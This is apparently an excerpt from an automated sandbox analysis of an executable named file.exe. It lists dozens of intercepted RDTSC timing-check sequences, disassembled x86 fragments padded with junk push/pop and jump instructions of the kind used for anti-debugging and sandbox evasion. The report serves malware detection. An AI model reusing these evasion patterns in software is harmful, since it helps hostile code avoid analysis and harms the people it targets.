                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 746B76 second address: 746C17 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FCA94618474h 0x0000000c jmp 00007FCA9461846Eh 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 jmp 00007FCA94618478h 0x0000001a lea eax, dword ptr [ebp+124776F4h] 0x00000020 and cl, FFFFFFE0h 0x00000023 push eax 0x00000024 pushad 0x00000025 jmp 00007FCA9461846Ah 0x0000002a push ebx 0x0000002b jmp 00007FCA9461846Dh 0x00000030 pop ebx 0x00000031 popad 0x00000032 mov dword ptr [esp], eax 0x00000035 push 00000000h 0x00000037 push edi 0x00000038 call 00007FCA94618468h 0x0000003d pop edi 0x0000003e mov dword ptr [esp+04h], edi 0x00000042 add dword ptr [esp+04h], 0000001Bh 0x0000004a inc edi 0x0000004b push edi 0x0000004c ret 0x0000004d pop edi 0x0000004e ret 0x0000004f jmp 00007FCA94618472h 0x00000054 lea eax, dword ptr [ebp+124776B0h] 0x0000005a movsx ecx, si 0x0000005d push eax 0x0000005e push ecx 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 746C17 second address: 72D6BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007FCA94C93E38h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 0000001Ah 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 xor dword ptr [ebp+122D17BCh], ebx 0x00000029 call dword ptr [ebp+122D1B32h] 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FCA94C93E45h 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a pushad 0x0000003b popad 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78A87C second address: 78A893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA94618473h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78A893 second address: 78A89B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78ABD2 second address: 78ABD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78ABD9 second address: 78ABE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FCA94C93E36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78B14E second address: 78B158 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78B158 second address: 78B170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA94C93E44h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78F296 second address: 78F2A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FCA94618466h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78F2A0 second address: 78F2A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78EE34 second address: 78EE47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA9461846Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78EE47 second address: 78EE51 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FCA94C93E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78EF7F second address: 78EFBA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94618477h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FCA94618479h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78EFBA second address: 78EFBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 791E0B second address: 791E10 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 791E10 second address: 791E19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 795D8F second address: 795D94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 795592 second address: 79559C instructions: 0x00000000 rdtsc 0x00000002 ja 00007FCA94C93E36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79559C second address: 7955A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7955A2 second address: 7955C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FCA94C93E3Fh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 je 00007FCA94C93E36h 0x00000016 pop ecx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7955C3 second address: 7955C8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7955C8 second address: 7955DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jl 00007FCA94C93E42h 0x0000000b ja 00007FCA94C93E36h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7465C5 second address: 7465CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FCA94618466h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79A575 second address: 79A593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FCA94C93E3Fh 0x0000000b jp 00007FCA94C93E36h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79EC70 second address: 79EC76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79EC76 second address: 79EC7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A14E8 second address: 7A14ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A73F6 second address: 7A73FB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A73FB second address: 7A740F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jo 00007FCA94618472h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A740F second address: 7A7415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A7415 second address: 7A7448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA94618473h 0x00000009 jmp 00007FCA94618476h 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A7448 second address: 7A744C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A744C second address: 7A7452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A797B second address: 7A7993 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94C93E3Fh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A7993 second address: 7A79B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push ecx 0x00000007 js 00007FCA94618468h 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FCA9461846Ch 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A7EC5 second address: 7A7EC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A81EA second address: 7A8208 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94618474h 0x00000007 jng 00007FCA94618466h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A8208 second address: 7A8213 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jp 00007FCA94C93E36h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A84CC second address: 7A84DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FCA94618466h 0x00000009 push edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push ecx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A87D0 second address: 7A87D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A87D4 second address: 7A87E3 instructions: 0x00000000 rdtsc 0x00000002 je 00007FCA94618466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A8DBE second address: 7A8DC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A8DC2 second address: 7A8DC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A909E second address: 7A90A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A90A2 second address: 7A90A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7AC279 second address: 7AC27D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7AC27D second address: 7AC291 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jno 00007FCA9461846Ch 0x0000000e jg 00007FCA94618466h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7AC811 second address: 7AC817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7AC817 second address: 7AC81B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7B9B1B second address: 7B9B24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7B9B24 second address: 7B9B2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7B9B2A second address: 7B9B2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7B9B2E second address: 7B9B32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7B9B32 second address: 7B9B55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jg 00007FCA94C93E36h 0x0000000f pop ecx 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 jp 00007FCA94C93E36h 0x0000001a pop edx 0x0000001b je 00007FCA94C93E3Ch 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7B9B55 second address: 7B9B59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7B7BA6 second address: 7B7BB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCA94C93E3Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7B7BB7 second address: 7B7BBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7B7BBB second address: 7B7BED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FCA94C93E3Eh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FCA94C93E48h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7B7BED second address: 7B7C02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCA9461846Bh 0x00000009 jnl 00007FCA94618466h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7B7C02 second address: 7B7C06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7B8078 second address: 7B8098 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FCA94618475h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7B8098 second address: 7B80B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA94C93E44h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7B80B0 second address: 7B80B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7B8347 second address: 7B834B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7B834B second address: 7B8364 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94618475h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7B8364 second address: 7B8381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FCA94C93E3Ah 0x0000000d jmp 00007FCA94C93E3Bh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7B8381 second address: 7B83AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007FCA9461846Ch 0x0000000e jl 00007FCA94618466h 0x00000014 popad 0x00000015 push ebx 0x00000016 jmp 00007FCA94618473h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7B83AE second address: 7B83B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7B83B4 second address: 7B83B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7B9960 second address: 7B998C instructions: 0x00000000 rdtsc 0x00000002 jp 00007FCA94C93E3Ch 0x00000008 jl 00007FCA94C93E52h 0x0000000e jmp 00007FCA94C93E46h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7B7742 second address: 7B7771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edi 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edi 0x0000000b jne 00007FCA94618477h 0x00000011 jmp 00007FCA94618471h 0x00000016 js 00007FCA9461846Ah 0x0000001c push eax 0x0000001d pop eax 0x0000001e pushad 0x0000001f popad 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7BD94C second address: 7BD952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7BD952 second address: 7BD95B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7BD95B second address: 7BD961 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7BD961 second address: 7BD98B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FCA94618475h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FCA9461846Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7C2815 second address: 7C2819 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7C2819 second address: 7C282E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007FCA94618468h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7C282E second address: 7C2847 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94C93E41h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7C2847 second address: 7C284B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7C284B second address: 7C284F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7C284F second address: 7C2855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7D2096 second address: 7D20C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA94C93E3Dh 0x00000009 jmp 00007FCA94C93E3Dh 0x0000000e popad 0x0000000f pop ecx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 js 00007FCA94C93E36h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7D20C1 second address: 7D20C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7D20C5 second address: 7D20DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jno 00007FCA94C93E36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FCA94C93E3Bh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7D1C16 second address: 7D1C20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FCA94618466h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7D1C20 second address: 7D1C24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7D1C24 second address: 7D1C30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7D1C30 second address: 7D1C49 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FCA94C93E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 jno 00007FCA94C93E36h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7D1C49 second address: 7D1C58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA9461846Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7D1C58 second address: 7D1C77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94C93E45h 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007FCA94C93E36h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7D1C77 second address: 7D1C7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7D1DBD second address: 7D1DD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jne 00007FCA94C93E3Ch 0x0000000b jnp 00007FCA94C93E36h 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7D5C19 second address: 7D5C1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7D5C1F second address: 7D5C40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FCA94C93E47h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7D5C40 second address: 7D5C47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7D5C47 second address: 7D5C53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 je 00007FCA94C93E36h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7D5C53 second address: 7D5C57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
